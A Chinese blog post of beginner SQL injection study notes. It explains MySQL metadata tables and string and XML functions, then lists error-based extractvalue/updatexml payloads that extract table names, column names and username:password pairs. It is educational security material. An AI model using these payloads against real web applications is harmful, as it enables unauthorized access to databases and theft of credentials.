一些入门的的SQL注入小白基础笔记

最新推荐文章于 2023-04-29 00:08:48 发布
最新推荐文章于 2023-04-29 00:08:48 发布
阅读量335 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unimoon1995/article/details/100150521
版权

SQL注入:
user()返回当前数据库连接使用的用户;
database()返回当前数据库连接使用的数据库;
version()返回当前数据库的版本;

information_schema为mysql中自带的数据库,提供访问数据库元数据的方式。
元数据:关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。
information_schema中,有数个只读表。实际上为视图,不是基本表。实际上为一个虚拟的数据库。只能通过select语句访问,不能对其进行增删改。

information_schema中的表:
schemata:所有库
tables:所有表
columns:所有字段

information_schema.tables表中
提供了关于数据库中表的信息
TABLE_SCHEMA ---->库名
TABLE_NAME ---->表名
TABLE_TYPE ---->表类型
ENGINE ---- >引擎
Version ---->版本
TABLE_ROWS ---->表的行数
AVG_ROW_LENGTH ---->表中行的平均行(字节)
INDEX_LENGTH ---->索引的占用空间大小(字节)

concat_ws(separator,str1,str2,…) 函数可以将这些函数进行组合使用并显示出来,其中第一个参数是作为分隔符使用,使用分隔符分隔再进行连接产生新的字符串
group_concat():将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

关于concat函数和concat_ws()函数的实例:
select concat(‘大’,‘小’) as size from 表
查询出结果为:大小

select concat(‘大’,NULL) as size from 表
查询出结果为:null
concat中又一个参数为NULL,查出来的就为NULL

select concat_ws(’_’,‘大’,‘小’,‘中’) as size from 表
查询出结果为:大_小_中

select concat_ws(’_’,‘大’,‘小’,NULL) as size from 表
查询出结果为:大_小

group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )

在这里插入图片描述

MySQL LIMIT获取前N行
SELECT column1,column2,… FROM table LIMIT N;
从第N行开始获取,获取M行
LIMIT M OFFSET N
如果回显只有一行,可以修改N从0~N 依次显示所有表名/字段名

extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string);
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)

UPDATEXML(XML_document, XPath_string, new_value);
new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
改变XML_document中符合XPATH_string的值

Payload:
or extractvalue(1, concat(0x7e, version())) or ‘’
or update(1, concat(0x7e, version()), 1) or ‘’

爆表名:
or extractvalue(1, concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1))) or ‘’
爆字段名:
or extractvalue(1, concat(0x7e, (select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1))) or ‘’
爆数据:
or extractvalue(1, concat(0x7e, (select concat_ws(’:’, username, password) from users limit 0,1))) or ‘’
updatexml的注入方式相同

ascii(str1)函数:
返回字符串str的最左面字符的ASCII代码值
str是空字符串,返回0
如果str是NULL,返回NULL
例:mysql> select ascii(‘hi’);
+————-+
| ascii(‘hi’) |
+————-+
| 104 |
+————-+
1 row in set

substring(string,position):
substring(str, pos, length) :#(被截取字段,从第几位开始截取,截取长度)
从特定位置开始的字符串返回一个给定长度的子字符串
string参数是要提取子字符串的字符串
position参数是一个整数,用于指定子串的起始字符,position可以是正或负整数。

unimoon1995
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入和sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 832
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
SQL注入基础入门篇 注入思路及常见的SQL注入类型总结
好好睡觉
03-04 6766
SQL注入基础部分、注入脚本、常见注入类型分类、报错注入、联合查询思路
关于sql注入这一篇就够了(适合入门
qq_53105813的博客
01-07 4929
sql注入详解
SQL注入入门
永远相信美好的事情即将发生
03-09 477
sql注入基础入门
SQL注入基础入门
wyp20011020的博客
03-29 220
sql注入
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入之新手入门示例详解
09-10
本文将从基础层面介绍SQL注入的原理、检测方法以及初步的防范措施。 首先,我们需要理解SQL注入的基本概念。当用户输入的数据(如URL参数`id`)被直接拼接到SQL查询中,如`SELECT username, password FROM table ...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
SQL注入从0到1
最新发布
Elite的博客
04-29 2821
SQL注入为OWASP top 10漏洞之一,本文带你由浅入深了解SQL注入基本原理,深度掌握各种注入方式
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 390
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
小白学习的sql注入
weixin_45901002的博客
08-27 501
sql注入简介一、sql注入漏洞原理二、漏洞危害三、sql注入分类四、sql-labs靶场搭建 一、sql注入漏洞原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1、程序编写者在处理程序和数据库交互时, 使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 二、漏洞危害 但凡使用数据库开发的应用系统,就可能存在SQL注入攻击的
sql注入 小白入门学习笔记(一)
mastergu2的博客
06-08 439
首先介绍几个英文单词: schema:数据库 table:表 column:列 / 字段 常用的函数: select就不说了,不会的建议去菜鸟教程看 insert into 表名 name(字段名1,字段名2…) values(值1,值2…) update 表名 set 字段名 = 更新后的值 where 选择条件 delete from 表名 where 选择条件 limit 偏移量,操作个数 比如说 limit 0,1 就是从0开始,查一个 几个查询数据库基本信息的函数: database() : 查看
SQL注入小白入门,大佬请绕道
LISTONE的个人博客
04-15 413
SQL注入小白入门,大佬请绕道 什么是SQL 结构化查询语言(Structured Query Language)简称SQL SQL使我们有能力访问数据库 什么是SQL注入 用户提交的数据可以当作命令被数据库解析执行 漏洞示例代码: <?php echo '<h1>欢迎关注LISTONE公众号</h1>'; $name = $_GET['nam...
小白sql注入
萍水间人的小天地
03-30 114
判断有无单引号报护 如果有单引号报护, 1' # 注释掉其后的单引号 and 1=1 1' and 1=1 # 依然回显数据 1 and 1=2 解决了我的一个疑惑, 就是如果 是 ’1 and 1=2' 还会不会执行语句, 现在看来是会的 1' order by 10 # 然后就判断数据表只有 4列 1' union se...
小白SQL注入(一)
x519461623的博客
11-28 296
数据库操作与注入逻辑(不玩数据库很难吃透sql注入) 要学sql注入,就得先了解数据库。 所谓知己知彼,百战不殆 如果你对数据库一窍不通,然后用Sql注入的一般测试方法去测… 对吧,加个’ 然后对面报错了你就高兴的大喊,“啊,这个有注入漏洞”然后就不知道怎么弄了 那么接下来就开始吧!(大佬勿喷) 我们先来看看数据库是个什么东西: (mysql的安装搭建这里就不讲了,百度很多) 也可以用集成坏境...
SQL注入的一个简单实例
热门推荐
u012436758的博客
12-25 1万+
很多Web应用程序都使用数据库来存储信息。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递至Web应用程序。很多Web站点都会利用用户输入的参数动态地生成SQL查询要求,攻击者通过在URL、表单域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据进行不受限的访问。
SQL注入基础学习(笔记
部分学习记录
07-29 647
此文为自己学习SQL注入基础笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
SQL注入防范基础教程
"SQL注入是一种常见的网络安全威胁,攻击者通过在Web表单中插入恶意SQL命令,欺骗服务器执行这些命令,从而获取、修改、删除数据库中的敏感信息。本文将介绍SQL注入的基本概念、危害以及如何防止SQL注入攻击。" SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值